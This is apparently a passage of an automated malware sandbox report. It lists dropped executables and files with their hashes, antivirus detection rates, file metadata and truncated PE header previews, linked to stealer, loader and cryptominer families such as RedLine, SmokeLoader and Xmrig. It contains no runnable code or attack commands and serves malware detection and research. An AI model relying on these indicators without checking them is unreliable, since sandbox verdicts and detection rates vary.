                                                                                                                                                hbw8Iew2qP.exeGet hashmaliciousGlupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, XmrigBrowse
                                                                                                                                                  CK4bT0GrLU.exeGet hashmaliciousGlupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                                                                                                                                    lPbCFVP9qN.exeGet hashmaliciousGlupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                                                                                                                                      8WrUglWiWb.exeGet hashmaliciousGlupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                                                                                                                                        NTykbOZNgR.exeGet hashmaliciousGlupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                                                                                                                                          MTxj96wecj.exeGet hashmaliciousGlupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\latestX.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5874968
                                                                                                                                                            Entropy (8bit):7.70017826439962
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:MMcDmMRlBdzs3EThgR0uEqBXLdcJAbtNmbOHaGhEospqOziZXAfrrARS7JL2ozPX:dcdrCET8XeospuZXAf0EJyocDKIVDT05
                                                                                                                                                            MD5:BAE29E49E8190BFBBF0D77FFAB8DE59D
                                                                                                                                                            SHA1:4A6352BB47C7E1666A60C76F9B17CA4707872BD9
                                                                                                                                                            SHA-256:F91E4FF7811A5848561463D970C51870C9299A80117A89FB86A698B9F727DE87
                                                                                                                                                            SHA-512:9E6CF6519E21143F9B570A878A5CA1BBA376256217C34AB676E8D632611D468F277A0D6F946AB8705121002D96A89274F38458AFFE3DF3A3A1C75E336D7D66E2
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: 62CqhWaRXv.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 5KAuN5LJp8.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: ZpYKkfX4OE.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: hngrEXSmFY.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: gvd1S6Rsnw.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: NZpBgYa3Xr.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 0JrumGQwIr.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: q7190nRWYq.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: NClZXnAXpR.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 576vSDlSuf.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: UOUUppuDer.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 8f9feab4c64cceed94d26521596cd9a58e0290a1907f6.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: FGFJ64uGR1.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: H6vdyhJY5W.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: hbw8Iew2qP.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: CK4bT0GrLU.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: lPbCFVP9qN.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 8WrUglWiWb.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: NTykbOZNgR.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: MTxj96wecj.exe, Detection: malicious, Browse
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....?.d...............&.....xY................@..............................Z.....@.Y...`... ...............................................Y.p.....Y......PY......|Y..)....Z.0........................... <Y.(.....................Y.`............................text...............................`..`.data.....W.......W.................@....rdata...>....Y..@....X.............@..@.pdata.......PY......6Y.............@..@.xdata..L....pY......PY.............@..@.bss.....-....Y..........................idata..p.....Y......dY.............@....CRT....`.....Y......pY.............@....tls..........Y......rY.............@....rsrc.........Y......tY.............@....reloc..0.....Z......xY.............@..B........................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14544
                                                                                                                                                            Entropy (8bit):6.2660301556221185
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:CSV text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):425
                                                                                                                                                            Entropy (8bit):5.353683843266035
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                            MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                            SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                            SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                            SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2224
                                                                                                                                                            Entropy (8bit):5.354902188542171
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:CWSU4y4RQmFoUeWmfgZ9tK8NPdMs7u1iMuge//8aOUyu0lhV:CLHyIFKL3IZ2KlDOugg01
                                                                                                                                                            MD5:80EA35E6235366285D62F286CDAE9652
                                                                                                                                                            SHA1:D92475BA18044F955224B9F524F6848F76D1F89B
                                                                                                                                                            SHA-256:5E0126B3E9570F2BA3024C6F332DE08DCE09F1BF0B516132E5E417CDE6BB459F
                                                                                                                                                            SHA-512:9C478D0C78D2B84F6AE98B7D01DF861D00D1A8CC135CC39ABE0219FACA9D44D0B71B756BB91C56FAB99DF1DA0095F2BB084BF31F152CA64DFC7B328CA18F315D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):64
                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\InstallSetup5.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5515264
                                                                                                                                                            Entropy (8bit):6.479505821994318
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:X4zVE2GO5za356R7mgdqMhW8hQjqb0It:gl7mg1WO
                                                                                                                                                            MD5:00E93456AA5BCF9F60F84B0C0760A212
                                                                                                                                                            SHA1:6096890893116E75BD46FEA0B8C3921CEB33F57D
                                                                                                                                                            SHA-256:FF3025F9CF19323C5972D14F00F01296D6D7A71547ECA7E4016BFD0E1F27B504
                                                                                                                                                            SHA-512:ABD2BE819C7D93BD6097155CF84EAF803E3133A7E0CA71F9D9CBC3C65E4E4A26415D2523A36ADAFDD19B0751E25EA1A99B8D060CAD61CDFD1F79ADF9CD4B4ECA
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\Broom.exe, Author: Joe Security
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......^..................?..........1?......@?...@..........................PV..................@...................0B.......A.@<...0G......................`B.t............................PB.....................p.A.D.... B......................text...\.>.......>................. ..`.itext...A....>..B....>............. ..`.data...d....@?.......?.............@....bss........ @..........................idata..@<....A..>....?.............@....didata...... B......:@.............@....edata.......0B......F@.............@..@.tls....T....@B..........................rdata..]....PB......H@.............@..@.reloc..t....`B......J@.............@..B.rsrc........0G.......E.............@..@.............PV......(T.............@..@................
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2671908
                                                                                                                                                            Entropy (8bit):7.668464601080612
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:Cl2s5FXQ4EmojLjCRELVf7Avil+dHIsLp1thIikN+6u2hs+:CzzX71oDCRAZUviAHImDqia7hs+
                                                                                                                                                            MD5:BC3354A4CD405A2F2F98E8B343A7D08D
                                                                                                                                                            SHA1:4880D2A987354A3163461FDDD2422E905976C5B2
                                                                                                                                                            SHA-256:FFFC160A4C555057143383FEC606841CD2C319F79F52596E0D27322A677DCA0B
                                                                                                                                                            SHA-512:FE349AF0497E2AA6933B1ACFEA9FECD2C1F16DA009A06AC7D7F638353283DA3EF04E9C3520D33BAE6E15EA6190420A27BE97F46E5553A538B661AF226C241C6B
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P..X............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc...X....P......................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4360056
                                                                                                                                                            Entropy (8bit):7.977276231616674
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:WkiZGwIB1dt+0CwQfqt+LbrNwxxujFg72jYYPbx4:Wkikw8dt+0C/IMhwxgi72jYh
                                                                                                                                                            MD5:2A92DBDA3DF9502DEF5E1C9009950699
                                                                                                                                                            SHA1:2FC2B1E67DE8FF36F36F65A6F54BE1C141D9AE1A
                                                                                                                                                            SHA-256:2CDE7B9FC5ACD7964916D023E78D42AE7AC6D511C5CD7CA57B066A94882A67EC
                                                                                                                                                            SHA-512:C1BF6076B20BAAC199F6786271A1959A19FEC82B32AB9944226104FFF3CD5D94FBCC5A6F1EF6BA04E3B05E397EBDF88416AE27204FDAEA4F67D1C03749636069
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............v...v...v.w....v......v......v......v.....v...w.;.v......v......v......v.Rich..v.................PE..L....&$c.................4A...:..............PA...@.................................Z.B....................................../A.......z..............|B.x...........................................@L..@...............D............................text....3A......4A................. ..`.data.....8..PA..L...8A.............@....rsrc.........z.......A.............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5874968
                                                                                                                                                            Entropy (8bit):7.70017826439962
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:MMcDmMRlBdzs3EThgR0uEqBXLdcJAbtNmbOHaGhEospqOziZXAfrrARS7JL2ozPX:dcdrCET8XeospuZXAf0EJyocDKIVDT05
                                                                                                                                                            MD5:BAE29E49E8190BFBBF0D77FFAB8DE59D
                                                                                                                                                            SHA1:4A6352BB47C7E1666A60C76F9B17CA4707872BD9
                                                                                                                                                            SHA-256:F91E4FF7811A5848561463D970C51870C9299A80117A89FB86A698B9F727DE87
                                                                                                                                                            SHA-512:9E6CF6519E21143F9B570A878A5CA1BBA376256217C34AB676E8D632611D468F277A0D6F946AB8705121002D96A89274F38458AFFE3DF3A3A1C75E336D7D66E2
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....?.d...............&.....xY................@..............................Z.....@.Y...`... ...............................................Y.p.....Y......PY......|Y..)....Z.0........................... <Y.(.....................Y.`............................text...............................`..`.data.....W.......W.................@....rdata...>....Y..@....X.............@..@.pdata.......PY......6Y.............@..@.xdata..L....pY......PY.............@..@.bss.....-....Y..........................idata..p.....Y......dY.............@....CRT....`.....Y......pY.............@....tls..........Y......rY.............@....rsrc.........Y......tY.............@....reloc..0.....Z......xY.............@..B........................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270848
                                                                                                                                                            Entropy (8bit):6.491820168131084
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:MkULcl5ZxKJo8LwzbXyTi4UDcVpdLdKHJPOCv09I3i+9P7HbMsoOz1:LUa5p/bXyTi4iGTdAJ7pf0sv
                                                                                                                                                            MD5:DCBD05276D11111F2DD2A7EDF52E3386
                                                                                                                                                            SHA1:F5DC6D418D9FB2D2CFA4AF440EC4FF78DA8F11EC
                                                                                                                                                            SHA-256:CEA5245BAB036B03F89D549C71F47DF8A14854B0DE515643BF95319EC5AF71D4
